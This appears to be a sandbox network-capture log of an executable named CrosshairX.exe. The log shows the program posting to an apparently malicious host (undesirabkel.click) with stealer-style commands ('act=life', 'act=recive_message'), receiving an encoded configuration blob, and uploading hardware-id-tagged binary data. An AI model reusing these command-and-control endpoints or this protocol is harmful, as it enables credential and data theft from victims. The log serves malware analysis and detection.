Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:59:54 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: undesirabkel.click
2025-01-05 18:59:54 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-05 18:59:58 UTC	1130	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:59:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tt08ucpl5srmebvr232g8ie6mc; expires=Thu, 01 May 2025 12:46:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BWVEPLxma%2FlGIYsH0D8yd3OlToSFqN4509d2DjR2LQ4Gv8IBksPZ22oFlDmip0ohC3Xv%2BGd1oUjUh9knE8TN7r8IKykoO4pAxAyuSiA%2B8qlKSbaLT2nP4eIlSnfW10oaQ67vPuc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd5b54affc87c6c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2012&min_rtt=2003&rtt_var=770&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1403171&cwnd=196&unsent_bytes=0&cid=31b747834984bdfa&ts=3630&x=0"
2025-01-05 18:59:58 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-05 18:59:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	188.114.96.3	443	7396	C:\Users\user\Desktop\CrosshairX.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:59:58 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 54 Host: undesirabkel.click
2025-01-05 18:59:58 UTC	54	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 69 6d 71 79 6c 78 78 68 6d 6e 66 66 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--imqylxxhmnff&j=
2025-01-05 18:59:59 UTC	1136	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:59:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fr9v0jn3283i8vh8bi0t14odb7; expires=Thu, 01 May 2025 12:46:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z4O6CrDSP6gWck6IlIWNGgYFxrOkCtKaQoQ%2BiE8h7yUk7V%2BY24Tz%2Bo58x1wceYuLuG%2FuotZkRQ9Ej7A2I4T%2BlRdf9Bwp22eBy7urNv07HGI64bSW2Zp4dz%2F%2Fhh89cSCCGEBJSGU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd5b5648ebc8c33-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=11928&min_rtt=9765&rtt_var=5207&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=956&delivery_rate=299027&cwnd=245&unsent_bytes=0&cid=6f995d8c6bb8f40f&ts=489&x=0"
2025-01-05 18:59:59 UTC	233	IN	Data Raw: 34 39 39 34 0d 0a 58 76 72 37 66 42 57 38 6c 45 4d 38 42 4c 4d 52 43 43 68 59 79 54 35 4b 70 51 61 59 54 37 62 49 4b 58 4e 4e 71 2f 61 55 70 4b 77 6c 32 49 31 65 4c 34 69 34 59 55 39 68 6b 53 74 38 57 69 32 73 45 6d 6a 45 59 72 70 31 30 4b 6c 46 41 43 69 48 31 4f 4c 4a 6a 6d 53 63 6d 68 42 6d 32 62 68 68 57 58 79 52 4b 31 4e 54 65 71 78 51 61 4a 38 6b 2f 53 58 55 71 55 55 52 4c 4d 43 5a 35 4d 6a 50 4e 70 61 63 46 48 44 66 38 43 4a 51 61 64 5a 30 62 55 6b 79 70 31 63 6e 7a 57 75 36 59 35 53 74 55 31 46 33 69 62 76 78 30 4d 30 54 6d 34 67 58 4e 38 47 34 4f 42 35 68 33 54 4d 79 43 6a 6d 73 58 43 62 44 59 76 4d 6e 33 71 42 4e 45 43 6e 42 68 76 33 43 78 44 61 59 6e 78 56 36 31 75 51 76 57 6d 37 Data Ascii: 4994Xvr7fBW8lEM8BLMRCChYyT5KpQaYT7bIKXNNq/aUpKwl2I1eL4i4YU9hkSt8Wi2sEmjEYrp10KlFACiH1OLJjmScmhBm2bhhWXyRK1NTeqxQaJ8k/SXUqUURLMCZ5MjPNpacFHDf8CJQadZ0bUkyp1cnzWu6Y5StU1F3ibvx0M0Tm4gXN8G4OB5h3TMyCjmsXCbDYvMn3qBNECnBhv3CxDaYnxV61uQvWm7
2025-01-05 18:59:59 UTC	1369	IN	Data Raw: 64 63 6d 64 4a 65 75 55 63 4c 39 38 6b 6f 6d 32 48 6d 45 67 41 50 74 79 5a 35 73 43 4f 49 39 61 41 58 6e 44 53 74 6e 6b 65 62 74 31 39 62 30 6b 31 72 46 30 6f 31 57 76 36 4c 74 79 69 54 78 73 67 78 70 76 34 7a 4d 6b 30 6b 5a 34 52 63 4e 62 77 4c 6c 30 6d 6e 7a 4e 74 55 6e 72 7a 48 41 6a 58 5a 2f 6b 35 32 62 73 4c 44 6d 48 51 31 50 48 4b 6a 6d 54 59 6e 78 42 32 30 2f 59 7a 56 6d 33 61 64 6e 68 42 4d 36 5a 52 4b 4d 70 75 39 53 37 55 72 55 45 62 49 4d 4f 51 2b 38 76 49 50 4a 6a 5a 55 44 66 5a 37 6d 45 47 4a 76 4a 32 65 6b 30 32 76 52 34 53 68 33 75 30 4e 4a 53 74 52 31 46 33 69 5a 7a 7a 78 63 30 33 6c 35 6f 57 66 4d 7a 32 4d 31 68 72 31 47 46 73 54 7a 53 68 58 7a 72 4e 61 76 77 75 33 61 46 43 46 43 6a 4e 31 4c 69 47 79 53 54 59 77 56 35 57 30 2f 30 74 56 48 Data Ascii: dcmdJeuUcL98kom2HmEgAPtyZ5sCOI9aAXnDStnkebt19b0k1rF0o1Wv6LtyiTxsgxpv4zMk0kZ4RcNbwLl0mnzNtUnrzHAjXZ/k52bsLDmHQ1PHKjmTYnxB20/YzVm3adnhBM6ZRKMpu9S7UrUEbIMOQ+8vIPJjZUDfZ7mEGJvJ2ek02vR4Sh3u0NJStR1F3iZzzxc03l5oWfMz2M1hr1GFsTzShXzrNavwu3aFCFCjN1LiGySTYwV5W0/0tVH
2025-01-05 18:59:59 UTC	1369	IN	Data Raw: 57 43 69 72 55 44 72 4c 62 76 77 69 32 61 59 4c 58 32 2f 4f 6a 4c 61 65 6a 68 61 62 6a 52 31 39 6e 4d 4d 69 55 47 6a 57 5a 53 70 56 64 4c 49 63 4c 38 73 6b 6f 6d 33 5a 71 30 4d 58 50 63 61 5a 39 63 6a 41 4d 35 32 57 46 6e 66 65 2b 79 52 61 62 64 70 77 5a 30 34 6f 6f 56 77 67 77 6d 58 77 4a 35 54 6b 43 78 59 33 69 63 79 32 39 39 6b 33 32 71 77 64 65 64 44 78 4e 78 35 35 6e 32 6f 71 54 54 62 72 42 47 6a 4b 62 50 38 6f 32 36 74 42 48 79 72 44 6d 50 37 49 7a 53 36 58 6e 52 35 37 31 76 77 73 55 47 4c 5a 65 6d 46 42 50 4b 74 64 49 6f 63 71 75 69 72 4d 36 68 4e 52 47 38 36 59 2b 38 6d 4d 43 5a 75 58 45 48 44 49 74 6a 34 51 66 35 46 30 5a 67 70 69 36 31 41 68 78 32 2f 77 4b 64 53 74 52 68 51 73 7a 70 66 37 77 63 51 79 6e 35 30 53 66 74 50 77 49 56 6c 69 31 47 46 Data Ascii: WCirUDrLbvwi2aYLX2/OjLaejhabjR19nMMiUGjWZSpVdLIcL8skom3Zq0MXPcaZ9cjAM52WFnfe+yRabdpwZ04ooVwgwmXwJ5TkCxY3icy299k32qwdedDxNx55n2oqTTbrBGjKbP8o26tBHyrDmP7IzS6XnR571vwsUGLZemFBPKtdIocquirM6hNRG86Y+8mMCZuXEHDItj4Qf5F0Zgpi61Ahx2/wKdStRhQszpf7wcQyn50SftPwIVli1GF
2025-01-05 18:59:59 UTC	1369	IN	Data Raw: 31 63 64 79 58 4b 36 4d 70 71 7a 43 78 59 6a 69 63 79 32 7a 38 63 75 6c 70 63 58 65 74 6a 2b 4a 6c 42 72 32 6e 56 68 54 54 32 74 55 53 44 4b 59 66 6b 73 30 4b 42 5a 45 69 54 44 6d 66 79 47 67 48 79 66 67 56 34 76 6e 74 45 74 64 33 62 4b 59 58 77 4b 4a 65 56 46 61 4d 42 6f 75 6e 57 55 71 55 51 59 49 4d 47 63 2b 63 6e 4b 4d 70 36 66 45 33 4c 52 2f 44 4e 57 61 4e 78 34 5a 55 45 6f 71 31 45 73 79 32 44 79 4a 74 37 71 42 56 45 6f 30 64 53 75 68 76 73 78 6c 35 6b 64 59 5a 37 70 62 30 63 6d 31 6e 38 71 45 6e 71 6e 55 69 6a 49 61 50 59 6d 33 4b 74 48 48 79 6a 4d 6e 66 37 4f 33 44 32 63 6b 52 39 35 30 66 63 6c 57 32 50 56 64 47 35 4d 4e 65 73 53 61 4d 42 38 75 6e 57 55 68 57 77 6b 62 65 69 75 74 74 6d 41 4a 64 69 65 45 6a 65 47 74 69 31 64 61 74 6c 38 62 45 4d 32 Data Ascii: 1cdyXK6MpqzCxYjicy2z8culpcXetj+JlBr2nVhTT2tUSDKYfks0KBZEiTDmfyGgHyfgV4vntEtd3bKYXwKJeVFaMBounWUqUQYIMGc+cnKMp6fE3LR/DNWaNx4ZUEoq1Esy2DyJt7qBVEo0dSuhvsxl5kdYZ7pb0cm1n8qEnqnUijIaPYm3KtHHyjMnf7O3D2ckR950fclW2PVdG5MNesSaMB8unWUhWwkbeiuttmAJdieEjeGti1datl8bEM2
2025-01-05 18:59:59 UTC	1369	IN	Data Raw: 64 75 38 53 6e 58 72 6b 34 65 4c 73 69 53 35 4d 48 48 4c 70 61 55 45 58 2f 57 2f 79 42 61 59 39 78 31 5a 6b 41 37 72 46 49 6d 7a 79 53 30 62 64 4f 79 43 30 6c 76 36 49 54 74 31 4e 67 78 75 5a 51 52 4e 38 47 34 4f 42 35 68 33 54 4d 79 43 6a 4f 35 57 43 58 56 62 66 30 6a 32 36 6c 5a 45 43 4c 43 68 76 48 4a 79 6a 75 55 6e 78 46 78 33 2f 4d 72 55 6d 48 55 65 47 56 47 65 75 55 63 4c 39 38 6b 6f 6d 33 36 6f 56 67 47 4c 4d 65 66 34 4e 32 4f 49 39 61 41 58 6e 44 53 74 6e 6b 65 5a 64 70 34 62 6b 6f 32 71 31 67 6c 78 33 62 31 4b 74 4f 6a 51 41 4d 6c 7a 70 50 39 7a 73 55 7a 6e 6f 73 53 65 63 7a 7a 4d 30 77 6d 6e 7a 4e 74 55 6e 72 7a 48 42 37 41 64 4f 6f 75 6c 70 74 64 45 6a 6e 43 6d 66 71 47 30 58 4b 42 32 52 6c 37 6e 71 35 68 57 47 6e 59 63 47 56 4c 4d 36 64 52 4c Data Ascii: du8SnXrk4eLsiS5MHHLpaUEX/W/yBaY9x1ZkA7rFImzyS0bdOyC0lv6ITt1NgxuZQRN8G4OB5h3TMyCjO5WCXVbf0j26lZECLChvHJyjuUnxFx3/MrUmHUeGVGeuUcL98kom36oVgGLMef4N2OI9aAXnDStnkeZdp4bko2q1glx3b1KtOjQAMlzpP9zsUznosSeczzM0wmnzNtUnrzHB7AdOoulptdEjnCmfqG0XKB2Rl7nq5hWGnYcGVLM6dRL
2025-01-05 18:59:59 UTC	1369	IN	Data Raw: 74 37 4b 46 46 49 79 7a 53 31 4f 6d 49 31 33 79 66 6c 56 34 76 6e 76 55 6d 58 57 66 62 65 6d 5a 46 50 61 39 4f 49 73 42 32 2b 79 7a 66 70 30 63 52 49 73 53 65 39 38 2f 44 4d 4a 57 65 47 58 6a 62 74 6d 38 65 59 63 6b 7a 4d 67 6f 62 70 6c 63 6b 6e 44 36 36 4d 70 71 7a 43 78 59 6a 69 63 79 32 78 73 51 35 6b 70 51 64 65 4e 33 6b 49 46 68 30 30 58 35 67 57 44 43 67 57 53 58 4b 61 66 6b 72 30 71 46 48 41 79 62 4a 6c 2f 32 47 67 48 79 66 67 56 34 76 6e 74 55 32 53 47 7a 57 66 33 78 42 4f 36 68 4b 4a 64 63 6b 74 47 33 46 72 56 70 52 64 39 2b 45 34 63 48 52 63 6f 48 5a 47 58 75 65 72 6d 46 59 62 39 64 30 62 45 51 6f 72 6c 6f 6e 79 47 33 7a 4b 64 79 70 53 78 55 72 7a 70 48 31 79 73 55 37 6d 35 59 61 66 74 44 2f 4c 68 34 6f 6b 58 52 79 43 6d 4c 72 66 54 50 45 61 50 Data Ascii: t7KFFIyzS1OmI13yflV4vnvUmXWfbemZFPa9OIsB2+yzfp0cRIsSe98/DMJWeGXjbtm8eYckzMgobplcknD66MpqzCxYjicy2xsQ5kpQdeN3kIFh00X5gWDCgWSXKafkr0qFHAybJl/2GgHyfgV4vntU2SGzWf3xBO6hKJdcktG3FrVpRd9+E4cHRcoHZGXuermFYb9d0bEQorlonyG3zKdypSxUrzpH1ysU7m5YaftD/Lh4okXRyCmLrfTPEaP
2025-01-05 18:59:59 UTC	1369	IN	Data Raw: 53 42 68 76 68 39 54 78 33 6f 35 6b 32 4c 6b 56 59 64 76 78 4e 78 78 54 30 6e 31 6b 54 53 7a 72 51 78 65 4a 4a 50 55 33 6c 50 4a 79 43 47 2f 4f 6d 4c 61 65 6a 69 6d 66 6d 52 6c 74 79 50 45 74 54 32 33 63 66 30 68 46 50 62 31 66 4a 38 52 31 38 32 48 66 70 77 74 66 62 38 36 4d 74 70 36 4f 45 35 2b 50 48 56 6a 64 35 79 67 65 4b 4a 46 30 66 41 70 69 36 32 4a 6f 31 57 66 71 4c 74 75 37 64 56 46 33 30 4b 71 32 7a 64 67 37 69 4a 6f 49 66 4e 50 36 4d 47 41 6d 69 53 63 34 47 47 6a 35 44 6a 65 48 65 38 56 6a 6c 4b 73 4c 53 52 62 51 31 4f 43 47 6c 6d 37 57 32 51 77 33 68 72 5a 6d 58 58 54 44 64 57 6c 63 4f 65 78 69 46 75 42 79 38 43 72 45 72 56 77 65 62 34 66 55 2b 59 61 57 42 64 69 51 47 57 7a 50 34 43 78 4f 59 5a 46 4d 4a 41 6f 69 36 77 52 6f 38 6d 66 30 49 39 4f Data Ascii: SBhvh9Tx3o5k2LkVYdvxNxxT0n1kTSzrQxeJJPU3lPJyCG/OmLaejimfmRltyPEtT23cf0hFPb1fJ8R182Hfpwtfb86Mtp6OE5+PHVjd5ygeKJF0fApi62Jo1WfqLtu7dVF30Kq2zdg7iJoIfNP6MGAmiSc4GGj5DjeHe8VjlKsLSRbQ1OCGlm7W2Qw3hrZmXXTDdWlcOexiFuBy8CrErVweb4fU+YaWBdiQGWzP4CxOYZFMJAoi6wRo8mf0I9O
2025-01-05 18:59:59 UTC	1369	IN	Data Raw: 4d 79 54 75 73 37 66 4d 5a 54 5a 55 44 66 4c 2f 53 31 59 61 38 51 38 65 31 77 35 76 56 74 6b 7a 33 58 33 49 5a 53 56 42 56 45 33 69 63 79 32 38 38 30 79 6c 70 34 49 5a 70 50 57 4b 6c 4a 6c 33 58 4a 74 43 6e 54 72 57 6d 69 66 4e 37 52 74 30 4c 73 4c 53 58 2b 62 7a 36 4f 56 6d 57 7a 4b 68 6c 42 75 6e 75 42 68 42 6a 53 66 4d 33 67 4b 59 75 73 62 4b 39 56 32 2f 43 37 43 71 51 77 76 45 63 69 5a 2b 59 72 41 4e 35 69 65 44 6d 48 46 75 69 6c 64 66 4d 74 4e 56 47 45 32 72 56 73 79 77 47 4c 63 44 5a 54 6b 43 78 35 76 6b 61 32 32 6a 6f 34 44 31 74 6b 47 4e 34 61 32 46 46 31 6f 33 33 52 38 57 33 65 44 66 78 4c 39 4a 74 59 71 77 65 68 2f 46 6a 2f 59 6e 2f 76 4b 6a 6e 4c 59 6e 31 34 76 6a 72 68 68 57 6e 65 52 4b 7a 6f 59 59 66 34 50 66 35 63 32 35 57 50 4e 36 6c 31 52 Data Ascii: MyTus7fMZTZUDfL/S1Ya8Q8e1w5vVtkz3X3IZSVBVE3icy2880ylp4IZpPWKlJl3XJtCnTrWmifN7Rt0LsLSX+bz6OVmWzKhlBunuBhBjSfM3gKYusbK9V2/C7CqQwvEciZ+YrAN5ieDmHFuildfMtNVGE2rVsywGLcDZTkCx5vka22jo4D1tkGN4a2FF1o33R8W3eDfxL9JtYqweh/Fj/Yn/vKjnLYn14vjrhhWneRKzoYYf4Pf5c25WPN6l1R
2025-01-05 18:59:59 UTC	1369	IN	Data Raw: 62 5a 67 43 58 59 6a 31 34 76 6a 62 68 68 54 43 61 4a 4d 79 31 45 4e 36 70 66 4a 73 52 32 36 43 76 58 76 45 68 57 45 66 65 78 2b 38 76 4c 4d 70 2b 6e 49 46 62 55 35 69 78 52 59 5a 4e 54 62 56 77 35 6c 57 49 66 31 6d 50 71 62 2f 4b 70 58 52 4a 76 68 39 54 75 68 70 5a 38 75 5a 4d 4f 65 74 48 78 59 33 35 68 78 33 41 71 42 48 71 76 48 48 43 48 51 66 63 67 30 61 52 4d 55 77 37 44 68 50 76 4a 79 58 36 34 6e 67 68 30 6e 72 68 68 55 69 61 4a 4d 32 74 41 4b 71 5a 54 4c 34 74 6a 34 43 71 55 35 41 73 66 62 35 48 55 39 38 7a 65 4d 5a 65 65 55 6e 48 51 2b 47 46 42 4b 4d 67 7a 66 41 70 69 2b 42 4a 6f 31 53 53 69 62 5a 4f 70 57 51 4d 70 79 6f 4c 31 67 66 41 43 74 59 73 5a 5a 39 32 30 45 46 4e 69 78 32 5a 70 57 6a 32 56 59 67 58 56 59 2b 6f 75 6c 70 74 64 45 69 2f 48 6b Data Ascii: bZgCXYj14vjbhhTCaJMy1EN6pfJsR26CvXvEhWEfex+8vLMp+nIFbU5ixRYZNTbVw5lWIf1mPqb/KpXRJvh9TuhpZ8uZMOetHxY35hx3AqBHqvHHCHQfcg0aRMUw7DhPvJyX64ngh0nrhhUiaJM2tAKqZTL4tj4CqU5Asfb5HU98zeMZeeUnHQ+GFBKMgzfApi+BJo1SSibZOpWQMpyoL1gfACtYsZZ920EFNix2ZpWj2VYgXVY+oulptdEi/Hk

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	188.114.96.3	443	7396	C:\Users\user\Desktop\CrosshairX.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:59:59 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=DY2BFWBA8K User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18122 Host: undesirabkel.click
2025-01-05 18:59:59 UTC	15331	OUT	Data Raw: 2d 2d 44 59 32 42 46 57 42 41 38 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 36 35 43 37 44 42 36 45 30 45 38 39 34 41 32 39 30 37 32 44 39 33 37 36 36 42 39 37 43 31 0d 0a 2d 2d 44 59 32 42 46 57 42 41 38 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 59 32 42 46 57 42 41 38 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 69 6d 71 79 6c 78 78 68 6d 6e 66 66 0d 0a 2d 2d 44 59 32 42 46 57 42 41 38 4b 0d 0a 43 Data Ascii: --DY2BFWBA8KContent-Disposition: form-data; name="hwid"E265C7DB6E0E894A29072D93766B97C1--DY2BFWBA8KContent-Disposition: form-data; name="pid"2--DY2BFWBA8KContent-Disposition: form-data; name="lid"LPnhqo--imqylxxhmnff--DY2BFWBA8KC
2025-01-05 18:59:59 UTC	2791	OUT	Data Raw: ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 Data Ascii: 'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwm
2025-01-05 19:00:00 UTC	1130	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 19:00:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1qet04d8kgphkr71dcalaau45h; expires=Thu, 01 May 2025 12:46:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bzklTLqhXplJbU19IxLtz9cTO4KZVhbSLZIGxzPte%2FLQWFvZFSViD2UKqS7fiRMBrgPI46BB46gXyFm5cvlOlzwo4aMFReT%2FFj1v6UNupPffT%2BdyurFoLV1TzYZyNT41QZjIKSA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd5b56b298a8cc0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2077&min_rtt=2009&rtt_var=802&sent=9&recv=21&lost=0&retrans=0&sent_bytes=2845&recv_bytes=19078&delivery_rate=1453459&cwnd=222&unsent_bytes=0&cid=c7072cc2d3b7ffe8&ts=621&x=0"
2025-01-05 19:00:00 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 19:00:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	188.114.96.3	443	7396	C:\Users\user\Desktop\CrosshairX.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 19:00:00 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6OSCRFZND7N User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8749 Host: undesirabkel.click
2025-01-05 19:00:00 UTC	8749	OUT	Data Raw: 2d 2d 36 4f 53 43 52 46 5a 4e 44 37 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 36 35 43 37 44 42 36 45 30 45 38 39 34 41 32 39 30 37 32 44 39 33 37 36 36 42 39 37 43 31 0d 0a 2d 2d 36 4f 53 43 52 46 5a 4e 44 37 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 4f 53 43 52 46 5a 4e 44 37 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 69 6d 71 79 6c 78 78 68 6d 6e 66 66 0d 0a 2d 2d 36 4f 53 43 52 46 5a 4e 44 37 Data Ascii: --6OSCRFZND7NContent-Disposition: form-data; name="hwid"E265C7DB6E0E894A29072D93766B97C1--6OSCRFZND7NContent-Disposition: form-data; name="pid"2--6OSCRFZND7NContent-Disposition: form-data; name="lid"LPnhqo--imqylxxhmnff--6OSCRFZND7
2025-01-05 19:00:01 UTC	1132	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 19:00:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0qbs103nnc5mr7qtsr9lvc69tt; expires=Thu, 01 May 2025 12:46:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oFfEiIjovuOtu7ESHl1pc88s85Z7JfQMY%2B32oSwyEMCsa3fwegs3mvlEVc0N4QA3CZ9YD6QqUe8VXghw7%2BGEMyMfRyFKc9u0%2BHZP8bIkNU5LKjH1%2F1ygWCIQ296vbaILGzbt2kA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd5b571f9c48c99-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3283&min_rtt=2035&rtt_var=1655&sent=8&recv=13&lost=0&retrans=0&sent_bytes=2845&recv_bytes=9683&delivery_rate=1434889&cwnd=247&unsent_bytes=0&cid=841463e83ff00751&ts=496&x=0"
2025-01-05 19:00:01 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 19:00:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	188.114.96.3	443	7396	C:\Users\user\Desktop\CrosshairX.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 19:00:02 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=GKSN1WXAJIFXQY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20420 Host: undesirabkel.click
